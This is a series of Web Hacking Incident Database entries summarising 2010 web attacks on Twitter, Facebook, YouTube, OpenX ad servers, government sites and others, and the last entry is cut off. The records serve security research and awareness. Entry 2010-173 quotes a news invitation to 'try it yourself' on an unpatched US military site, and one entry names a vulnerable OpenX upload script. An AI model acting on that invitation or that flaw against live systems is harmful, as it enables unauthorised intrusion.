Entry Title: WHID 2010-175: Persistent XSS Bug on Twitter Being Exploited
WHID ID: 2010-175
Date Occured: 9/21/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: There is currently a persistent cross-site scripting vulnerability on the main Twitter site and researchers say that the bug is being exploited via proof-of-concept code. The bug appeared Tuesday morning and experts quickly noticed users taking advantage of the flaw. Details of the bug are slim right now, though experts say that mousing over a specific link will produce a pop-up window that displays the logged-in user's Twitter cookie.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://threatpost.com/en_us/blogs/persistent-xss-bug-twitter-being-exploited-092110
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-174: GOP lawmaker: My Twitter account was 'hacked by robospammers'
WHID ID: 2010-174
Date Occured: 9/15/2010
Attack Method: Brute Force
Application Weakness: Insufficient Authentication
Outcome: Link Spam
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Rep. John Culberson (R-Texas) returned to Twitter after nearly a five-month break Tuesday night only to have his account hacked. "If you got a weird tweet from me ignore it & do not click on the hyperlinks -they are prob viruses- my account was hacked by robospammers," he tweeted Wednesday morning. He noted later that he had "fixed the account."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://thehill.com/blogs/twitter-room/other-news/118909-gop-lawmaker-my-twitter-account-was-hacked-by-robospammers
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-173: Polish hacker gets inside US Military's Defence Logistic Agency website
WHID ID: 2010-173
Date Occured: 9/16/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: There is one movie every Polish person knows. It's a cult comedy from the 80s called "Miś" - meaning "Teddy Bear". Now, thanks to a hacker going by a name "Porkythepig", everyone can see it - but not on YouTube where you would expect it, but on the USA military Defence Logistics Agency website. If you go the site and just type "porkythepig", a fragment of a movie begins to play. It's in Polish, of course - for those not fluent in Polish the man with a guitar sings: "I'm a Happy Romek..." * It's funny but the story is much more serious. On Seclists.org you can find a post by porkythepig about the potential vulnerability that exists on many sites, including military and government. But apparently since March, when the details of the insecurity were published on seclists.org, nobody did anything to patch the vulnerability so porkythepig decided to prove his observations the hard way. Polish language source is here - but the vulnerability still works at time of publishing so try it yourself.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.techeye.net/security/polish-hacker-gets-inside-us-militarys-defence-logistic-agency-website
Attack Source Geography: Poland
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://seclists.org/fulldisclosure/2010/Mar/521
Entry Title: WHID 2010-172: Cipro steps up security after hacking
WHID ID: 2010-172
Date Occured: 9/17/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disinformation
Attacked Entity Field: Government
Attacked Entity Geography: South Africa
Incident Description: The Companies and Intellectual Property Registration Office (Cipro) said on Thursday it beefed up internal security to make sure directors cannot be removed from companies without the proper processes being followed. It emerged last week that several directors of Kalahari Resources had been removed with their names substituted. Cipro has been under fire for several months following claims criminals were able to hack into its database.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.eyewitnessnews.co.za/articleprog.aspx?id=48673
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-171: Hackers Push Malicious Ads onto UK Celebrity Gossip Website
WHID ID: 2010-171
Date Occured: 9/17/2010
Attack Method: Known Vulnerability
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Entertainment
Attacked Entity Geography: UK
Incident Description: The Popbitch celebrity gossip website was blacklisted by Google after hackers managed to compromise its ad server and push malware to users. A Popbitch spokesperson has since confirmed that the website served malicious ads for a limited period of time after its ad server was compromised by hackers. "We've got to the bottom of this problem and are just waiting for the all clear from Google," they told The Register. "There is a vulnerability in Open Ads X, the ad server we were using. We've cut off open ads from Popbitch and are upgrading to OpenAds 2.8.7," they added.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Hackers-Push-Malicious-Ads-onto-UK-Celebrity-Gossip-Website-156768.shtml
Attack Source Geography:
Attacked System Technology: OpenX
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-170: OpenX Vulnerability Exploited to Compromise Multiple Ad Servers
WHID ID: 2010-170
Date Occured: 9/15/2010
Attack Method: Known Vulnerability
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: A vulnerability in a component of the OpenX advertising platform has been exploited by hackers to tamper with ad serving on multiple websites including The Pirate Bay, eSarcasm and AfterDawn. The affected component, called Open Flash Chart 2, is developed by a third party, but has been included by default in OpenX since last December. The module allows visitor statistics to be displayed as graphic charts and the vulnerability is located in the ofc_upload_image.php script, which fails to properly validate uploaded files or the users uploading them. According to Heise Media, the flaw was originally discovered a year ago by another open source project, which uses the same component, but it escaped the OpenX developers when deciding to integrate it. As a result, hackers can leverage the bug to upload executable scripts and gain complete control of the servers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Unpatched-OpenX-Vulnerability-Exploited-to-Compromise-Multiple-Ad-Servers-156402.shtml
Attack Source Geography:
Attacked System Technology: OpenX
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-169: TechCrunch Europe hacked to spread malware like a poison ivy infection
WHID ID: 2010-169
Date Occured: 9/7/2010
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: Europe
Incident Description: Graham Cluley, Senior Technology Consultant at Sophos, blogged, "A closer examination of TechCrunch Europe's site reveals that the offending code - which uses a malicious iFrame - is found in a JavaScript file, used by the site as part of its WordPress infrastructure. This attempts to serve up a malicious PDF file, exploiting a vulnerability that brings to your computer a nasty infection from the ZBot (also known as Zeus) malware family."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.computerworld.com/16888/techcrunch_europe_hacked_to_spread_malware_like_a_poison_ivy_infection
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-168: Symantec secures its vulnerable "Hack is Wack" site
WHID ID: 2010-168
Date Occured: 9/7/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description: Security giant Symantec said it has secured its “Hack is Wack” contest website after researchers discovered it was riddled with vulnerabilities. Last week, Symantec, with the help of famed rapper Snoop Dogg, began promoting its new “Hack is Wack” marketing campaign for its Norton anti-virus products. As part of the effort, budding rappers are invited to post a video about cybercrime for a chance to win Snoop concert tickets and to hang out with his management team.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineus.com/symantec-secures-its-vulnerable-hack-is-wack-site/article/178388/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-167: Facebook closes hole that let spammers auto-post to walls, friends
WHID ID: 2010-167
Date Occured: 9/7/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Improper Output Handling
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: acebook has closed a hole that was being used by spammers to automatically post wall messages and direct messages to friends, the company said on Tuesday. Just clicking on the link to one of the applications that were taking advantage of the bug would allow the auto-posting to happen, Facebook said. The apps, which appeared to be sending people to a survey Web site, were disabled on Monday, the company said. "Earlier this week, we discovered a bug that made it possible for an application to bypass our normal CSRF (cross-site request forgery) protections through a complicated series of steps. We quickly worked to resolve the issue and fixed it within hours of discovering it," Facebook said in a statement. "For a short period of time before it was fixed, several applications that violated our policies were able to post content to people's profiles if those people first clicked on a link to the application."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.cnet.com/8301-27080_3-20015728-245.html
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-166: Twitter Patches Account Hijacking Vulnerability
WHID ID: 2010-166
Date Occured: 9/8/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Session Hijacking
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Twitter users faced a virulent new JavaScript-based account hijacking attack on Monday. Simply clicking on one of the malicious links involved, disguised as innocuous-looking links in Tweets, enabled attackers to hijack a user's account and post numerous Tweets.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=227300371&cid=RSSfeed_IWK_News
Attack Source Geography: Brazil
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-165: FMT under DDOS attack
WHID ID: 2010-165
Date Occured: 9/9/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: News
Attacked Entity Geography: Malaysia
Incident Description: The FreeMalaysiaToday website has come under attack, rendering the news portal inaccessible to readers since 3am this morning. According to FMT's chief technical officer Thirun Nadason, the Distributed Denial of Service (DDOS) attack is believed to be the work of professionals.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.freemalaysiatoday.com/fmt-english/news/general/10094-fmt-under-ddos-attack
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-164: Company Paid to Launch DoS Attacks Against Torrent Sites
WHID ID: 2010-164
Date Occured: 9/10/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: An Indian company paid by the film industry to get copyrighted works removed from the Internet openly admits to launching Denial of Service (DoS) attacks against torrent sites that refuse to comply with takedown notices.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Company-Paid-to-Launch-DoS-Attacks-Against-Torrent-Sites-155892.shtml
Attack Source Geography: India
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-163: Ironman websites targeted by cyberattack
WHID ID: 2010-163
Date Occured: 8/31/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Sports
Attacked Entity Geography:
Incident Description: According to a press release today from Ironman.com, the site was a victim of a Distributed Denial-of-Service (DDoS) attack.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.examiner.com/triathlon-in-national/ironman-websites-targeted-by-cyberattack?render=print#print
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-162: Dick's says poll was hacked
WHID ID: 2010-162
Date Occured: 9/1/2010
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Disinformation
Attacked Entity Field: Hospitality
Attacked Entity Geography: Washington, USA
Incident Description: The poll to influence where a new Dick's Drive-In location will be built has been so popular, a hacker found a way to electronically stuff the ballot box. Monday, the company's website, www.ddir.com, listed three geographic areas where the restaurant could be built. A hacker wrote a script that repeatedly cast votes for one of the locations.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.seattlepi.com/local/426071_dicks02.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-161: IBC Bank Online Banking Website is Down or Under DDoS Attack?
WHID ID: 2010-161
Date Occured: 9/2/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Finance
Attacked Entity Geography: Texas, USA
Incident Description: There has been a lot of online banking website or internet-based banking experiencing a downtime for various reason these past few weeks. Last week we reported that the Bank of America website crashes down for at least 4 hours and now the IBC bank. Both the IBC Bank website (IBC.com) and the IBC Bank Online login site (ibcbankonline.ibc.com) are down currently.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.adi-news.com/ibc-bank-online-banking-website-is-down-or-under-ddos-attack/24357/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-160: Hackers crack e-mail server of Russian Federal Protection Service (gov.ru)
WHID ID: 2010-160
Date Occured: 8/23/2010
Attack Method: Insufficient Authentication
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Russia
Incident Description: Email server of one of Federal Protection Service (FPS) departments was attacked. As a result, for several hours every Internet user was allowed to access FPS e-mail archive. Successful attack was conducted because of available outbound access and also because of administrators failure – they did not modify default settings, including passwords for accounts used to access the system with administrative privileges.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.securitylab.ru/news/397019.php
Attack Source Geography:
Attacked System Technology: Dozor
Cost:
Items Leaked:
Number of Records:
Additional Link: http://habrahabr.ru/blogs/infosecurity/102391/
Entry Title: WHID 2010-159: 500 000 websites hacked, including Apple
WHID ID: 2010-159
Date Occured: 8/17/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Worm
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: As reported by The Register IT news portal, a number of smaller websites have been hacked using an SQL injection attack method that attempts to obfuscate links to malware infected pages. The hack apparently also affected two Apple websites that are used to promote its iTunes podcasts. Other than the Apple sites, the news service says that at least 538 000 “mom-and-pop” websites have been victimized by the hack, in addition to 500 000 more that appear quite similar but lead to different domains. The attack takes advantage of web-based application vulnerabilities, which often do not differentiate between legitimate search queries and intentional attacks via malicious code. The Register reported that the malware-infected links have been removed from the Apple pages since Google last indexed its search page earlier this month. The attack underlines the need for companies to go the extra mile and secure external web-facing applications said Rob Horton, the operational director of security testing consultant NCC Group.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.infosecurity-us.com/view/11870/500-000-websites-hacked-including-apple/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.theregister.co.uk/2010/08/17/apple_sql_attack/
Entry Title: WHID 2010-158: National Space Agency of the Republic of Kazakhstan was hacked
WHID ID: 2010-158
Date Occured: 7/18/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Kazahtan
Incident Description: On the 18th of July the hack-world.org group using an SQL Injection attack obtained access to the administration section of the National Space Agency of the Republic of Kazakhstan. Obtaining access to the administration system of the site was facilitated by the fact that administrators used weak passwords that allowed local recovery using MD5 hash. Currently, the site is under reconstruction.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://habrahabr.ru/blogs/infosecurity/99736/
Attack Source Geography: Russia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://hack-world.org/showthread.php?t=5133
Entry Title: WHID 2010-157: Facebook Full Disclosure
WHID ID: 2010-157
Date Occured: 7/20/2010
Attack Method: SQL Injection
Application Weakness: Information Leakage
Outcome: Disclosure Only
Attacked Entity Field: Internet
Attacked Entity Geography:
Incident Description: apps.facebook.com website hacked via SQL Injection.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://sla.ckers.org/forum/read.php?16,35138,35138#msg-35138
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://devteev.blogspot.com/2010/07/facebook-full-disclosure.html
Entry Title: WHID 2010-156: The Russian Railways tickets site was hacked
WHID ID: 2010-156
Date Occured: 7/21/2010
Attack Method: Unknown
Application Weakness: Misconfiguration
Outcome: Defacement
Attacked Entity Field: Transport
Attacked Entity Geography: Russia
Incident Description: Unknown attackers hack the official site of "Russian Railways" company. As a result, web pages were replaced by hackers’ messages. The site was temporary blocked; now it is resumed but some pages are still unavailable, "Buying Train Tickets" web page is among them (ticket.rzd.ru). No details about personal data leakage is now available.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.uinc.ru/news/sn14165.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-155: S. Korean Gov't Websites Hit by Hacker Attacks
WHID ID: 2010-155
Date Occured: 7/7/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: South Korea
Incident Description: Official websites of South Korean government agencies, including the presidential office and the foreign ministry, came under hacker attacks Wednesday, a national telecom regulator said. According to the state-run Korean Communications Commission ( KCC), the websites of government agencies, such as the presidential office Cheong Wa Dae, the Ministry of Foreign Affairs and Trade, and private firms, including the leading Internet search engine Naver, Nonghyup Bank and the Korean Exchange Bank, were hit by the so-called distributed denial-of-service (DDoS) attacks from around local time 6:00 p.m. (0900 GMT) Wednesday.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://english.cri.cn/6966/2010/07/07/1461s581567.htm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-154: Justin Bieber My World Tour Contest Hacked
WHID ID: 2010-154
Date Occured: 7/2/2010
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Disinformation
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: That was but a preliminary skirmish – they’ve come up with a much more damaging plan – to send Bieber to North Korea. Foolish, foolish Bieber has started a competition for countries to vote for him to come and tour them. Called the Justin Bieber My World Tour Contest, it has now been thoroughly highjacked by Anonymous – at the time of writing, North Korea is in second place by only a few thousand votes. Unless the current leader Israel can get its act together, it should be overtaken by lunchtime.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.independent.co.uk/2010/07/02/the-plot-to-send-justin-bieber-to-north-korea/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-153: App Store, Hacked.
WHID ID: 2010-153
Date Occured: 7/4/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: This article began with details of one specific app developer hacking iTunes users accounts and purchasing their own apps using those accounts – making it to the top of the iTunes charts. As the story has developed it appears to be far more widespread than just that one particular developer and his apps…the Apple App store is filled with App Farms being used to steal. We’ve put together a complete list of all the facts and updates to this story here which we high recommend you read instead of this article. Apple has also now released a statement about the matter.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://thenextweb.com/apple/2010/07/04/app-store-hacked/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-152: The Pirate Bay hacked
WHID ID: 2010-152
Date Occured: 7/5/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field: Internet
Attacked Entity Geography: Sweden
Incident Description: According to an advisory posted on the web site of Argentinian group of security researchers, they were able to obtain access to the Pirate Bay’s administration panel, by discovering multiple SQL injections, leading to the exposure of emails, MD5 hashes for passwords, and the IP address for any particular Pirate Bay user.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://krebsonsecurity.com/2010/07/pirate-bay-hack-exposes-user-booty/
Attack Source Geography: Argentina
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://insilence.biz/2010/07/multiple-sql-injections-on-the-pirate-bay/
Entry Title: WHID 2010-151: YouTube Hacked
WHID ID: 2010-151
Date Occured: 7/4/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Today, members of the Internet communities 4chan and other enterprising computer whizzes hacked YouTube using a vulnerability in the site’s comment system. While the hack was used on a variety of videos, striking music videos featuring teen pop idol Justin Bieber was the most popular activity. Twitter lit up with complaints about the problem, Google support got some concerned posts on its forum, and we received tips in our inbox. The event caused quite a Sunday-morning stir. The bug allowed users to inject HTML (the code that most websites are built with) that could be executed on the site, whereas HTML within comments is supposed to be restricted. The hackers did everything from force pop-up messages to appear over the site declaring that it had been hacked to redirecting Bieber video pages to sites hosting pornography and malware.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.acunetix.com/blog/web-security-zone/articles/dangerous-xss-vulnerability-found-on-youtube-the-vulnerability-explained/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-150: At least four Armenian websites were attacked by Azerbaijani hackers
WHID ID: 2010-150
Date Occured: 7/3/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Armenia
Incident Description: At least four Armenian websites were attacked by Azerbaijani hackers during a week. On July 2, the websites of Henaran.am press club (Henaran.am) and Armenia's Sambo Federation (sambo.am) were hacked to place Azerbaijan's flag and references to Azerbaijani media on them. Meanwhile, the websites' operation has already been resumed. Besides, on June 29, hackers attacked Azdagir.am site of announcements again to place the Azerbaijani flag on it, as well as information on the January 20, 1990, events in Baku. On June 30, the owner of psyarmenia.com website told PanARMENIAN.Net that the site on psychology was hacked and a poster on "Armenian terror" was placed on it. Currently, the two websites do not operate.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.panarmenian.net/eng/it_telecom/news/50897/At_least_four_Armenian_websites_were_attacked_by_Azerbaijani_hackers
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-149: Identity Stolen Through X-Box Live
WHID ID: 2010-149
Date Occured: 7/3/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Monetary Loss
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: Rosalinda Gonzalez's bought the X-Box 360 console for her sons. They enjoy playing the video games and using the live service where they can connect with players from around the world. In order to purchase the monthly live membership, Gonzalez entered her credit card information to her son's online profile. It is suppose to be kept private but Gonzalez says her son's profile was hacked by a computer whiz. The man changed her son's password, stole game points and started making purchases using her credit card information. She says her boys actually spoke to the hacker through X-Box live. The man admitted to stealing other people's personal information too.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krgv.com/content/news/story/Identity-Stolen-Through-X-Box-Live/vKZIV1Rboki6lngI78Qf_w.cspx
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-148: AsSeenOnTV SQL injection into corporate web server exposed credit card information of customers
WHID ID: 2010-148
Date Occured: 6/29/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: AsSeenOnTV website hacked via SQL Injection and planted malware.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://datalossdb.org/incidents/2953
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-147: Biggest blog company Skyblog hacked 32,000,000 accounts stolen
WHID ID: 2010-147
Date Occured: 5/19/2010
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Blogs
Attacked Entity Geography: France
Incident Description: Earlier this week, IT staff Skyrock / Skyblog audit its servers, an old classic that can trace bugs and small technical malfunctions. Except this time, the "bug" seems to be much more serious. A filenamed "hello"and some scripts are discovered on a server. Neither one, nor two, the alert is triggered. A more complete audit is implemented. It is then discovered that an intrusion has been orchestrated from a backdoor downloaded via a service misconfigured (Waka) "Download". From this facility, malicious, or the pirates have certainly got their hands on more than 32 million accounts skyblogueurs. It seems that the intruder will be difficult to trace. He crushed the logs after its passage. A ip appears, however, it resulted in a proxy, based in England. The drafting of ZATAZ.COM could know the exact date of the intrusion.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://datalossdb.org/incidents/2948
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-146: Hacking ring busted over test scores
WHID ID: 2010-146
Date Occured: 6/29/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Disinformation
Attacked Entity Field: Education
Attacked Entity Geography: China
Incident Description: Police in Jinan, Shandong Province arrested several members of a ring that hacked into education websites to change test scores and forge credentials for cash.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://english.people.com.cn/90001/90776/90882/7044956.html
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-145: Hacker tries to manipulate Maine's legislative website
WHID ID: 2010-145
Date Occured: 6/29/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: Maine
Incident Description: The state's online database of legislative activity has been taken offline because of an attempt by an unknown hacker to manipulate the website's coding. On Thursday, the Legislature's information technology officials shut down the website's bill status function, which allows users to follow legislation such as roll calls, committee votes, amendments and fiscal notes. The manipulated code inserted the addresses of extraneous websites that could have exposed users' computers to harm if they clicked on the links, said Scott Clark, director of information technology for the Legislature.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.pressherald.com/news/hacker-tries-to-manipulate-legislative-website-_2010-06-29.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-144: Hackers Steal $465,000 from Escrow Firm
WHID ID: 2010-144
Date Occured: 6/29/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: California
Incident Description: A total of $465,000 was recently stolen from California-based Village View Escrow via 26 consecutive wire transfers. "Owner Michelle Marisco said her financial institution at the time -- Professional Business Bank of Pasadena, Calif. -- normally notified her by e-mail each time a new wire was sent out of the company’s escrow account," writes Krebs on Security's Brian Krebs. "But the attackers apparently disabled that feature before initiating the fraudulent wires." "Marisco said that a few days before the theft, she opened an e-mail informing her that a UPS package she had been sent was lost, and urging her to open the attached invoice," Krebs writes. "Nothing happened when she opened the attached file, so she forwarded it on to her assistant who also tried to view it. The invoice was in fact a Trojan horse program that let the thieves break in and set up shop and plant a password-stealing virus on Marisco’s computer, and on the PC belonging to her assistant -- the second person needed to approve transfers."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.esecurityplanet.com/headlines/article.php/3890291/article.htm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-143: Whirlpool Repeatedly Hit by DDoS Attacks
WHID ID: 2010-143
Date Occured: 6/29/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: Australia
Incident Description: Australian broadband news website Whirlpool.net.au was the target of several Distributed Denial of Service (DDoS) attacks this morning. The hosting provider moved quickly to mitigate, but attackers evaded the restrictions, causing an aggregated downtime of around ten hours. Whirlpool.net.au is one of the most trafficked Australian websites, housing a community of over 350,000 registered users. It was started twelve years ago as a place to discuss Internet broadband services in the country, but has since evolved into a full-blown news website covering the telecommunications industry. "Bulletproof received monitoring alerts of packet loss at 12:45 am. We identified it as a classic denial-of-service attack being targeted at Whirlpool. We immediately blocked Whirlpool IP addresses to observe it better and then we were able to track down that it was originating from Denmark and the United States," Lorenzo Modesto, chief operating officer at Bulletproof Networks, the company hosting Whirlpool, commented for ZDNet Australia.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Whirlpool-Repeatedly-Hit-by-DDoS-Attacks-145629.shtml
Attack Source Geography: Denmark
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-142: Hackers vandalise 200 web sites, cripple 150
WHID ID: 2010-142
Date Occured: 6/28/2010
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Downtime
Attacked Entity Field: Hosting Providers
Attacked Entity Geography: Australia
Incident Description: The web sites of more than a whopping 200 Australian organisations were hijacked and vandalised in a spate of hacks last week. In the largest single attack, a hacker gained administrative access to the Direct Admin server management system used by a hosting provider, who Computerworld Australia will not name, and suspended 159 accounts rendering their web sites inaccessible to the public. The suspension notification page was then defaced with the hackers’ moniker and religious propaganda. The hack was launched through a flaw created after an automatic patch of the admin system failed to complete.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com.au/article/351360/hackers_vandalise_200_web_sites_cripple_150/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-141: Virginia Right! Under Fire Yesterday With DDOS Attack
WHID ID: 2010-141
Date Occured: 6/27/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Blogs
Attacked Entity Geography: Virginia, USA
